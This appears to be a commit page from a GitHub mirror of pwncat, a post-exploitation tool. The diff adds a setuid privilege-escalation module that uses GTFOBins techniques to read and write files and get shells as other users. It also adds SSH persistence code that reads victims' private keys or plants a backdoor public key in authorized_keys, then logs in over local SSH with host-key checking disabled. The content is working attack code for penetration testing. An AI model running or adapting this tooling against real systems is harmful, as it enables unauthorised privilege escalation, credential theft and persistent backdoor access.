1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-23 17:15:38 +01:00

Added initial setuid escalate module

Initial tests are positive. Haven't implemented auto logic yet
and more testing needs to be done with the layout/architecture
of the escalation modules. *however*, it is working.
This commit is contained in:
Caleb Stewart 2020-08-31 00:23:46 -04:00
parent 0167c5194a
commit 9a855c409f
3 changed files with 360 additions and 25 deletions

View File

@ -92,10 +92,12 @@ class Command(CommandDefinition):
# Organize results by category
for result in results:
if not isinstance(result, pwncat.modules.Result) or result.category is None:
uncategorized.append(result)
elif result.is_long_form():
if isinstance(result, pwncat.modules.Result) and result.is_long_form():
longform.append(result)
elif (
not isinstance(result, pwncat.modules.Result) or result.category is None
):
uncategorized.append(result)
elif result.category not in categories:
categories[result.category] = [result]
else:

View File

@ -1,7 +1,8 @@
#!/usr/bin/env python3
from typing import List, Dict
from typing import List, Dict, Tuple
from io import BytesIO
import dataclasses
import os
import pwncat
from pwncat.modules import (
@ -45,6 +46,96 @@ class Technique:
def exec(self, binary: str):
raise NotImplementedError
def __str__(self):
cap_names = {
Capability.READ: "file read",
Capability.WRITE: "file write",
Capability.SHELL: "shell",
}
return (
f"[magenta]{cap_names[self.caps]}[/magenta] as [green]{self.user}[/green] "
f"via {self.module.human_name(self)}"
)
class GTFOTechnique(Technique):
""" A technique which is based on a GTFO binary """
def __init__(
self,
user: str,
module: "EscalateModule",
method: pwncat.gtfobins.MethodWrapper,
**kwargs,
):
super(GTFOTechnique, self).__init__(method.cap, user, module)
self.method = method
self.kwargs = kwargs
def write(self, filepath: str, data: str):
payload, input_data, exit_cmd = self.method.build(
lfile=filepath, length=len(data), **self.kwargs
)
mode = "w"
if self.method.stream is pwncat.gtfobins.Stream.RAW:
mode += "b"
try:
printable = pwncat.util.isprintable(data)
except UnicodeDecodeError:
printable = False
if self.method.stream == pwncat.gtfobins.Stream.PRINT and not printable:
raise EscalateError(f"{self}.write: input data not printable")
# Run the command
pipe = pwncat.victim.subprocess(
payload,
mode,
data=input_data.encode("utf-8"),
exit_cmd=exit_cmd.encode("utf-8"),
no_job=True,
)
# Write the data and close the process
with self.method.wrap_stream(pipe) as pipe:
pipe.write(data.encode("utf-8"))
def read(self, filepath: str):
payload, input_data, exit_cmd = self.method.build(lfile=filepath, **self.kwargs)
mode = "r"
if self.method.stream is pwncat.gtfobins.Stream.RAW:
mode += "b"
pipe = pwncat.victim.subprocess(
payload,
mode,
data=input_data.encode("utf-8"),
exit_cmd=exit_cmd.encode("utf-8"),
no_job=True,
)
return self.method.wrap_stream(pipe)
def exec(self, binary: str):
payload, input_data, exit_cmd = self.method.build(shell=binary, **self.kwargs)
# Run the initial command
pwncat.victim.run(payload, wait=False)
# Send required input
pwncat.victim.client.send(input_data.encode("utf-8"))
# Return the command to close out completely
return exit_cmd
@dataclasses.dataclass
class FileContentsResult(Result):
@ -77,6 +168,43 @@ class FileContentsResult(Result):
return BytesIO(self.data)
@dataclasses.dataclass
class EscalateChain(Result):
""" Chain of techniques used to escalate """
user: str
""" Initial user before escalation """
chain: List[Tuple[Technique, str]]
""" Chain of techniques used to escalate """
@property
def category(self):
return None
@property
def title(self):
return "Escalation Route"
@property
def description(self):
result = []
for i, (technique, _) in enumerate(self.chain):
result.append(f"{(i+1)*' '}[yellow]\u2ba1[/yellow] {technique}")
return "\n".join(result)
def add(self, technique: Technique, exit_cmd: str):
""" Add a link in the chain """
self.chain.append((technique, exit_cmd))
def unwrap(self):
""" Exit each shell in the chain with the provided exit script """
# Go through the chain in reverse
for technique, exit_cmd in self.chain[::-1]:
# Send the exit command
pwncat.victim.client.send(exit_cmd)
@dataclasses.dataclass
class EscalateResult(Result):
""" The result of running an escalate module. This object contains
@ -97,24 +225,19 @@ class EscalateResult(Result):
@property
def description(self):
cap_names = {
Capability.READ: "file read",
Capability.WRITE: "file write",
Capability.SHELL: "shell",
}
result = []
for technique in self.techniques:
result.append(
f"[magenta]{cap_names[technique.caps]}[/magenta] as [green]{technique.user}[/green] via {technique.module.name}"
)
for user, techniques in self.techniques.items():
for technique in techniques:
result.append(f" - {technique}")
return "\n".join(result)
return "\n".join(result)
def extend(self, result: "EscalateResult"):
""" Extend this result with another escalation enumeration result.
This allows you to enumerate multiple modules and utilize all their
techniques together to perform escalation. """
for key, value in result.techniques:
if key not in self.techniques:
self.techniques[key] = value
@ -128,7 +251,9 @@ class EscalateResult(Result):
else:
self.techniques[technique.user].append(technique)
def write(self, user: str, filepath: str, data: bytes):
def write(
self, user: str, filepath: str, data: bytes, progress, no_exec: bool = False
):
""" Attempt to use all the techniques enumerated to write to a file
as the given user """
@ -143,9 +268,12 @@ class EscalateResult(Result):
except EscalateError:
continue
if no_exec:
raise EscalateError(f"file write as {user} not possible")
# Can't perform directly. Can we escalate to the user with a shell?
try:
exit_cmd = self.exec(user, shell="/bin/sh")
exit_cmd = self.exec(user, shell="/bin/sh", progress=progress)
except EscalateError:
raise EscalateError(f"file write as {user} not possible")
@ -160,7 +288,7 @@ class EscalateResult(Result):
# did to get here.
pwncat.victim.client.send(exit_cmd)
def read(self, user: str, filepath: str):
def read(self, user: str, filepath: str, progress, no_exec: bool = False):
""" Attempt to use all the techniques enumerated to read a file
as the given user """
@ -169,15 +297,18 @@ class EscalateResult(Result):
# See if we can perform this action directly
for technique in self.techniques[user]:
if Capability.WRITE in technique.caps:
if Capability.READ in technique.caps:
try:
return technique.read(filepath)
except EscalateError:
continue
if no_exec:
raise EscalateError(f"file read as {user} not possible")
# Can't perform directly. Can we escalate to the user with a shell?
try:
exit_cmd = self.exec(user, shell="/bin/sh")
exit_cmd = self.exec(user, shell="/bin/sh", progress=progress)
except EscalateError:
raise EscalateError(f"file read as {user} not possible")
@ -191,18 +322,178 @@ class EscalateResult(Result):
except (PermissionError, FileNotFoundError):
raise EscalateError(f"file read as {user} not possible")
def exec(self, user: str, shell: str):
def exec(self, user: str, shell: str, progress):
""" Attempt to use all the techniques enumerated to execute a
shell as the specified user """
original_user = pwncat.victim.current_user
original_id = pwncat.victim.id
task = progress.add_task("", module="escalating", status="...")
if user in self.techniques:
# Catelog techniques based on capability
readers: List[Technique] = []
writers: List[Technique] = []
# Ensure all output is flushed
pwncat.victim.flush_output()
# Ensure we are in a safe directory
pwncat.victim.chdir("/tmp")
for technique in self.techniques[user]:
if Capability.READ in technique.caps:
readers.append(technique)
if Capability.WRITE in technique.caps:
readers.append(technique)
if Capability.SHELL in technique.caps:
try:
return technique.exec(shell)
progress.update(task, status=str(technique))
exit_cmd = technique.exec(shell)
# Ensure we are stable
pwncat.victim.reset(hard=False)
pwncat.victim.update_user()
# Check that the escalation succeeded
new_id = pwncat.victim.id
if new_id["euid"] == original_id["euid"]:
continue
return EscalateChain(
original_user.name, [(technique, exit_cmd)]
)
except EscalateError:
continue
progress.update(task, status="checking for ssh server")
sshd = None
for fact in pwncat.modules.run(
"enumerate.gather", progress=progress, types=["system.service"]
):
if "sshd" in fact.data.name and fact.data.state == "running":
sshd = fact.data
ssh_path = pwncat.victim.which("ssh")
used_tech = None
if sshd is not None and sshd.state == "running" and ssh_path:
# SSH is running and we have a local SSH binary
progress.update(task, "checking authorized keys location")
# Get the path to the authorized keys file
for fact in pwncat.modules.run(
"enumerate.gather", progress=progress, types=["sshd.authkey_path"],
):
authkey_path = fact.data
break
else:
progress.log(
"[yellow]warning[/yellow]: assuming authorized key path: .ssh/authorized_keys"
)
authkey_path = ".ssh/authorized_keys"
# Find relative authorized keys directory
home = pwncat.victim.users[user].homedir
if not authkey_path.startswith("/"):
if home == "" or home is None:
raise EscalateError("no user home directory")
authkey_path = os.path.join(home, authkey_path)
progress.update(task, status="reading authorized keys")
# Attempt to read the authorized keys file
# this may raise a EscalateError, but that's fine.
# If we don't have this, we can't do escalate anyway
with self.read(user, authkey_path, no_exec=True) as filp:
authkeys = [line.strip().decode("utf-8") for line in filp]
for pubkey_path in ["id_rsa.pub"]:
# Read the public key
pubkey_path = os.path.join(home, ".ssh", pubkey_path)
progress.update(task, status=f"attempting to read {pubkey_path}")
with self.read(user, pubkey_path, no_exec=True) as filp:
pubkey = filp.read().strip().decode("utf-8")
if pubkey not in authkeys:
continue
# The public key is an authorized key
privkey_path = pubkey_path.replace(".pub", "")
progress.update(
task,
status=f"attempting to read {pubkey_path.replace('.pub', '')}",
)
try:
with self.read(user, privkey_path, no_exec=True) as filp:
privkey = (
filp.read()
.strip()
.decode("utf-8")
.replace("\r\n", "\n")
)
except EscalateError:
# Unable to read private key
continue
# NOTE - this isn't technically true... it could have been any
# of the readers...
used_tech = readers[0]
break
else:
# We couldn't read any private keys. Try to write one instead
with open(pwncat.victim.config["privkey"], "r") as filp:
privkey = filp.read()
with open(pwncat.victim.config["privkey"] + ".pub", "r") as filp:
pubkey = filp.read().strip()
# Add our public key
authkeys.append(pubkey)
# This may cause a EscalateError, but that's fine. We have failed
# if we can't write anyway.
progress.update(task, status="adding backdoor public key")
self.write(
user, authkey_path, ("\n".join(authkeys) + "\n").encode("utf-8")
)
# NOTE - this isn't technically true... it could have been any
# of the writers
used_tech = writers[0]
# Private keys **NEED** a new line
privkey = privkey.strip() + "\n"
# Write the private key
progress.update(task, status="uploading private key")
with pwncat.victim.tempfile("w", length=len(privkey)) as filp:
filp.write(privkey)
privkey_path = filp.name
# Ensure we track this new file
pwncat.victim.tamper.created_file(privkey_path)
pwncat.victim.run(f"chmod 600 {privkey_path}")
# First, run a test to make sure we authenticate
command = (
f"{ssh_path} -i {privkey_path} -o StrictHostKeyChecking=no -o PasswordAuthentication=no "
f"{user}@127.0.0.1"
)
output = pwncat.victim.run(f"{command} echo good")
if b"good" not in output:
raise EscalateError("ssh private key failed")
# The test worked! Run the real escalate command
pwncat.victim.process(command)
return EscalateChain(original_user.name, [(used_tech, "exit")])
raise EscalateError(f"exec as {user} not possible")
@ -267,7 +558,7 @@ class EscalateModule(BaseModule):
),
"shell": Argument(str, default="current", help="The shell to use for exec"),
"path": Argument(str, default=None, help="The file to read/write"),
"data": Argument(bytes, default=None, help="The data to write to a file"),
"data": Argument(str, default=None, help="The data to write to a file"),
}
# This causes the BaseModule to collapse a single generator result
# into it's value as opposed to returning a list with one entry.
@ -300,13 +591,18 @@ class EscalateModule(BaseModule):
yield Status(technique)
result.add(technique)
if shell == "current":
shell = pwncat.victim.shell
if exec:
yield result.exec(user=user, shell=shell)
yield result.exec(user=user, shell=shell, progress=self.progress)
elif read:
filp = result.read(user=user, filepath=path)
filp = result.read(user=user, filepath=path, progress=self.progress)
yield FileContentsResult(path, filp)
elif write:
yield result.write(user=user, filepath=path, data=data)
yield result.write(
user=user, filepath=path, data=data, progress=self.progress
)
else:
yield result
@ -321,3 +617,7 @@ class EscalateModule(BaseModule):
yield None
raise NotImplementedError
def human_name(self, tech: "Technique"):
""" Defines the human readable name/description of this vuln """
return self.name

View File

@ -0,0 +1,33 @@
#!/usr/bin/env python3
import pwncat
from pwncat.gtfobins import Capability, Stream, BinaryNotFound
from pwncat.modules.escalate import EscalateModule, EscalateError, GTFOTechnique
class Module(EscalateModule):
"""
Utilize binaries marked SETUID to escalate to a different user.
This module uses the GTFOBins library to generically locate
payloads for binaries with excessive permissions.
"""
def enumerate(self):
""" Enumerate SUID binaries """
for fact in pwncat.modules.run(
"enumerate.gather", progress=self.progress, types=["file.suid"]
):
try:
binary = pwncat.victim.gtfo.find_binary(fact.data.path, Capability.ALL)
except BinaryNotFound:
continue
for method in binary.iter_methods(
fact.data.path, Capability.ALL, Stream.ANY
):
yield GTFOTechnique(fact.data.owner.name, self, method, suid=True)
def human_name(self, tech: "Technique"):
return f"[cyan]{tech.method.binary_path}[/cyan] ([red]setuid[/red])"